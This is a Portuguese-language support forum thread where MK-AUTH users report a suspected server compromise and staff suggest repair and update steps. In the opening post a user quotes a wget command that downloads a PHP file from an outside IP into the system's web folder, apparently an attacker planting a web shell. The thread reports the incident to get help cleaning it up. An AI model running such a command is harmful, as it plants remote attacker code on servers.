mkauth sendo hackeado ?

Bom dia!

não consigo ver os logs.

o uptime e outras variaveis não funcionam mais.

acho que fui hackeado.

quando abri o mkauth hoje consegui ver esse comando:

wget http://131.196.4.58/mkfiles/e.php -O ../mkfiles/exp.php

aparentemente foi alterado esse arquivo.

fiz um tracert nesse ip e é de outra cidade do pernambuco

possivelmente me hackearam por lá.

alguem sabe como posso resolver sem ter que restaurar o backup ?

segue em anexo os prints da tela.

mkauth_hackeado.JPG

ip_invasor.JPG

terminal.JPG

Para adicionar comentários, você deve ser membro de MK-AUTH.

Join MK-AUTH

Votos 0
Enviar-me um email quando as pessoas responderem –

Respostas

  • Bom dia prezado(a),

    As variáveis na parte superior da página, também não voltou ao normal?

    Gere um backup e restaure em uma máquina de teste, para ver se fica correto.

    Qualquer dúvida, estamos à disposição.

    Atenciosamente,
    Equipe MK-AUTH

  • Bom dia!
    Obrigado Pedro, consegui atualizar para v21.01 K4.9

    depois reparei os dados, reiniciei... limpei o cache ctrl F5

    mesmo assim segue dando erro no log de mensagens

    8747067893?profile=RESIZE_710x

    fora isso tudo funciona normal.

    mas fico sem conseguir ver os logs pois não me aparece lá embaixo o botão para passar as paginas de log de mensagens.

    tem algum outro procedimento que posso fazer ?

    ou só formatando :[

  • pronto amigo, liberei o paraguai aqui no firewall...

    Mateus M Alencar disse:

    sim estou usando ip de outro país

    link lacnic paraguaio

    ip 45.175.156.2

    se puder liberar para que eu possa atualizar por gentileza.

    8744597055?profile=RESIZE_710x

  • Prezado(a),

    Vou passar para o Pedro, assim que ele responder, avisaremos.

    Qualquer dúvida, estamos à disposição.

    Atenciosamente,
    Equipe MK-AUTH

  • sim estou usando ip de outro país

    link lacnic paraguaio

    ip 45.175.156.2

    se puder liberar para que eu possa atualizar por gentileza.

    8744597055?profile=RESIZE_710x

  • Boa tarde prezado(a),

    O teste que fiz agora, o update funcionou normal.

    O seu sistema está em nuvem, em outro país?

    Confira se o DNS e gateway estão configurados corretamente no sistema.

    Verifique se não há bloqueios para o acesso do sistema à internet.

    Qualquer dúvida, estamos à disposição.

    Atenciosamente,
    Equipe MK-AUTH

  • não estou conseguindo atualizar o mk-auth

    8744439662?profile=RESIZE_710x

  • Bom dia!

    Achei que era o pessoal que estou trocando o sistema, ai como vi o post aqui, também vejo que foi invadido o meu servidor mk-auth.

    Mais o meu foi desse ip aqui 185.220.101.9.

    Como eu atualizei o sistema, sumiu todas essas informações.

    Vamos onde isso vai dar...

    Mateus M Alencar disse:

    esse ip 185.220.101.144 é desconhecido por mim.

    fiz todos os passos, mas continua aparecendo esse erro...

    esse erro só aparece quando entro em Controle de Logs / Logs do Sistema

    8744009065?profile=RESIZE_710x

    8744020899?profile=RESIZE_710x

  • esse ip 185.220.101.144 é desconhecido por mim.

    fiz todos os passos, mas continua aparecendo esse erro...

    esse erro só aparece quando entro em Controle de Logs / Logs do Sistema

    8744009065?profile=RESIZE_710x

    8744020899?profile=RESIZE_710x

  • Bom dia prezado(a),

    Para corrigir as variáveis de informações na parte superior da tela:

    1. Verifica se no nome da empresa cadastrado no sistema, tem algum caractere especial ou acentuação;
    2. Clique na logo do sistema, para abrir a página inicial do sistema;
    3. Segure a tecla Ctrl e pressione F5 para atualizar o cache da página;
    4. Se não resolver, gere um backup manual, salve em outro dispositivo e prossiga com os próximos passos;
    5. Repare os dados do sistema, no menu principal, acessando pelo Putty;
    6. Reinicie o sistema e repita o passo 2;
    7. Faça um update e reinicie o sistema;

    Você reconhece o IP 185.220.101.144 ? É da sua rede ou de algum usuário que acessa externamente?

    Qualquer dúvida, estamos à disposição.

    Atenciosamente,
    Equipe MK-AUTH

This reply was deleted.